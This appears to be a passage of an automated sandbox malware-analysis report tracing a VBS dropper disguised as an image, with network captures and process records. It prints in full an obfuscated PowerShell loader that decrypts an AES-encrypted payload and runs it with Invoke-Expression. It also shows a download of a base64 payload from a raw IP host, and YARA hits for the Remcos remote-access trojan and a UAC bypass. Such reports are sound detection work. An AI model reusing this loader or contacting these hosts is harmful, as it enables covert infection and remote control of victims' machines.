                    Jul 27, 2024 13:30:02.121294022 CEST1236INData Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
                    Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
                    Jul 27, 2024 13:30:02.121330023 CEST1236INData Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
                    Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
                    Jul 27, 2024 13:30:02.121788025 CEST1236INData Raw: 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb
                    Data Ascii: G-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j}0=pk`ESqHx1>~M.#z_
                    Jul 27, 2024 13:30:02.121819973 CEST1236INData Raw: 3a 99 d6 dd ca ee 08 39 b5 20 96 f8 90 cc 09 cc fd 27 88 be 9f 49 a9 63 23 22 95 65 76 50 3d 41 81 1b 78 17 54 4e 01 24 f0 ff 00 0e d2 6b df 67 87 4a 49 a8 80 91 1e 22 24 60 76 95 2c c7 72 fa 4f 2d 5d af a9 cf 36 f3 69 54 ca 93 c3 b9 dc ee 49 76
                    Data Ascii: :9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v
                    Jul 27, 2024 13:30:02.121855021 CEST1236INData Raw: e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61
                    Data Ascii: gmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,q*t*Ux+,NG*)UeUe
                    Jul 27, 2024 13:30:02.127259016 CEST1236INData Raw: 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5
                    Data Ascii: Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO!"=y#_o^m Pq.by/Dh-6q'@4)*}eb-G=\r(,}if,


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449731192.3.176.154806744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    Jul 27, 2024 13:30:04.074002981 CEST74OUTGET /50/HNBC.txt HTTP/1.1
                    Host: 192.3.176.154
                    Connection: Keep-Alive
                    Jul 27, 2024 13:30:04.548584938 CEST1236INHTTP/1.1 200 OK
                    Date: Sat, 27 Jul 2024 11:30:04 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                    Last-Modified: Fri, 26 Jul 2024 01:08:07 GMT
                    ETag: "a1000-61e1c24e75450"
                    Accept-Ranges: bytes
                    Content-Length: 659456
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/plain
                    Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                    Jul 27, 2024 13:30:04.548633099 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                    Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                    Jul 27, 2024 13:30:04.548669100 CEST1236INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                    Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                    Jul 27, 2024 13:30:04.548702002 CEST672INData Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                    Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
                    Jul 27, 2024 13:30:04.548738003 CEST1236INData Raw: 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 67 6b 4d 41 4a 44 4f 79 41 6a 4d 6f 49 44 49 79 67 68
                    Data Ascii: gwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDUygkMAJDOyAjMoIDIyghMQIDCyAQM4HD8xgeMgHD2xAdMIHDwxgbMwGDqxAaMYGDkxgYMAGDexAXMoFDYxgVMQFDSxAUM4EDMxgSMgEDGxARMIEDAwgPMwDD6wAOMYDD0wgMMADDuwALMoCDowgJMQCDiwAIM4BDcwgGMgBDWwAFMIBDQwgDM
                    Jul 27, 2024 13:30:04.548773050 CEST1236INData Raw: 38 44 4c 2f 51 79 50 63 38 44 46 2f 77 77 50 45 34 44 2f 2b 51 76 50 73 37 44 35 2b 77 74 50 55 37 44 7a 2b 51 73 50 38 36 44 74 2b 77 71 50 6b 36 44 6e 2b 51 70 50 4d 36 44 68 2b 77 6e 50 30 35 44 62 2b 51 6d 50 63 35 44 56 33 77 37 4e 34 65 44
                    Data Ascii: 8DL/QyPc8DF/wwPE4D/+QvPs7D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIeDe3Q3NwdDb3g2NkdDY3w1NYdDV3A1NMdDS3Q0NAdDP3gzN0cDM3wyNocDJ3AyNccDG3QhN4bD92AvNcbD22QtNQbDz2gsNEbDw2AkN8YDO2QiNgYDH2ghNUYDE2wgNIUD/
                    Jul 27, 2024 13:30:04.548811913 CEST1236INData Raw: 41 73 4e 32 5a 6a 62 32 6b 52 4e 78 56 44 4c 31 55 52 4e 41 51 7a 31 30 45 4a 4e 62 4e 54 61 7a 38 68 4d 71 45 6a 61 78 6b 42 4d 50 44 44 68 77 73 48 4d 50 41 6a 42 41 41 41 41 4d 42 51 42 67 41 41 41 41 38 54 69 2f 41 6f 50 39 37 7a 73 39 77 62
                    Data Ascii: AsN2Zjb2kRNxVDL1URNAQz10EJNbNTaz8hMqEjaxkBMPDDhwsHMPAjBAAAAMBQBgAAAA8Ti/AoP97zs9wbPM1zF8cCPUsDj7YlOCeDm34jNNXj51UcNNVDL1YBNdTzd0gENeMTty0tMQKjFyQQM7FTNAAAAIBQBQAAAA8j88UDPtwTJ80BPWoTU6UhODkT858dONnDG28SNwXj31wcN6WDq1YZNEWjc1AWNOVDP1oSNYQD10AMN
                    Jul 27, 2024 13:30:04.548844099 CEST1236INData Raw: 4c 44 32 79 4d 73 4d 51 4b 6a 4c 79 63 53 4d 63 46 54 56 41 41 41 41 41 43 41 42 77 43 41 41 41 34 54 4a 39 73 43 50 6c 79 54 55 37 34 32 4f 6f 74 6a 56 37 6f 78 4f 50 6f 7a 65 36 77 53 4f 36 6e 6a 79 33 73 38 4e 74 65 6a 70 33 34 34 4e 48 65 44
                    Data Ascii: LD2yMsMQKjLycSMcFTVAAAAACABwCAAA4TJ9sCPlyTU742OotjV7oxOPoze6wSO6njy3s8Ntejp344NHeDe3g2NhdjI0cFAAAAOAQAoA8TL/ERP03jv9MRPDwTq8YIPQxjP8cwOMvTs7E4OIpz06UsOArzs60pOHqDg68VOvdzc2MqNEajY1QfNSXjw10aNjWjA00ONkTz10wMN2Rjb0kENBRzE0wwM7PT8zc+MgPT0zs8MEPTu
                    Jul 27, 2024 13:30:04.548878908 CEST1236INData Raw: 77 5a 4d 33 46 7a 58 78 63 56 4d 4c 46 54 4f 78 41 53 4d 59 45 54 45 77 34 50 4d 79 44 44 35 77 63 4e 4d 53 44 54 78 77 41 4d 4d 33 43 54 71 77 4d 4b 4d 59 43 6a 6b 77 63 49 4d 2f 42 44 64 77 34 47 4d 64 42 44 57 77 6b 45 4d 57 41 7a 41 41 41 41
                    Data Ascii: wZM3FzXxcVMLFTOxASMYETEw4PMyDD5wcNMSDTxwAMM3CTqwMKMYCjkwcIM/BDdw4GMdBDWwkEMWAzAAAAAgCABABwPt/T4/Q9PP/Tm/c4PD5Tx+4qPY0jz9YbPn1DX9MAPizzO7o+OWvzy7A8O7uTs7w6OSuzd7o0Oyoj+6QtO3qTg6clO4gjG4UxNnfjx3E8NOezh3g2NedDW3kzNvUzO1ADN3Tj70MIN9Rzd00GNZQTBz8/M
                    Jul 27, 2024 13:30:04.548914909 CEST1236INData Raw: 36 6a 6a 2b 6b 6f 50 45 36 44 65 2b 45 6c 50 4d 35 7a 52 2b 73 6a 50 58 34 6a 45 2b 30 67 50 42 30 54 33 39 67 64 50 54 33 6a 79 39 4d 61 50 65 32 54 6d 39 6b 59 50 6e 31 54 57 39 30 55 50 2b 30 6a 49 38 67 50 50 77 7a 54 32 38 6b 4d 50 4e 79 54
                    Data Ascii: 6jj+koPE6De+ElPM5zR+sjPX4jE+0gPB0T39gdPT3jy9MaPe2Tm9kYPn1TW90UP+0jI8gPPwzT28kMPNyTg60BOijDt44KOiejZ3I2NedjW3Y1NSdjT3o0NGdjQ34zN6cjN3IzNucjK3YyNicjH3oxNWcjE34wNKcjB3IgN+bj+2YvNybj72oOAAAApAMAgAAAA0IOAAAADAMAcA8DU+gtPFzDL8gCPkwDI8sxOWvDg7w3O4tDd
                    Jul 27, 2024 13:30:04.554217100 CEST1236INData Raw: 34 35 4f 57 75 6a 54 37 67 30 4f 77 73 6a 43 36 6b 76 4f 76 72 44 30 36 55 53 4f 30 6c 6a 42 34 6b 50 4f 30 6a 7a 30 34 34 4d 4f 4a 6a 44 75 34 6f 49 4f 71 67 54 41 33 49 37 4e 61 64 54 51 33 6b 7a 4e 53 63 54 42 32 63 71 4e 64 61 7a 69 32 55 6f
                    Data Ascii: 45OWujT7g0OwsjC6kvOvrD06USO0ljB4kPO0jz044MOJjDu4oIOqgTA3I7NadTQ3kzNScTB2cqNdazi2UoN+ZTa2MkNyYjI2YhNDUD81EaN1RT108MNuSTq08JNUSji0AIN6RDd04GNoRjV0wENERTO0MDNtQjF04wMRPTyzs7MxOjozc5MSODjzU4MyNjVz00MINTOz0yMaMjEy4vM1LD8ycuMiLz2ywsMGLTuxMeMZHzzxUcM


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449734178.237.33.50801344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    TimestampBytes transferredDirectionData
                    Jul 27, 2024 13:30:07.153363943 CEST71OUTGET /json.gp HTTP/1.1
                    Host: geoplugin.net
                    Cache-Control: no-cache
                    Jul 27, 2024 13:30:07.815247059 CEST1170INHTTP/1.1 200 OK
                    date: Sat, 27 Jul 2024 11:30:07 GMT
                    server: Apache
                    content-length: 962
                    content-type: application/json; charset=utf-8
                    cache-control: public, max-age=300
                    access-control-allow-origin: *
                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:07:29:58
                    Start date:27/07/2024
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs"
                    Imagebase:0x7ff6e5c30000
                    File size:170'496 bytes
                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:1
                    Start time:07:29:58
                    Start date:27/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                    Imagebase:0x7ff788560000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:07:29:58
                    Start date:27/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:07:30:04
                    Start date:27/07/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Imagebase:0x7f0000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    Reputation:high
                    Has exited:false

                    Target ID:4
                    Start time:07:30:07
                    Start date:27/07/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
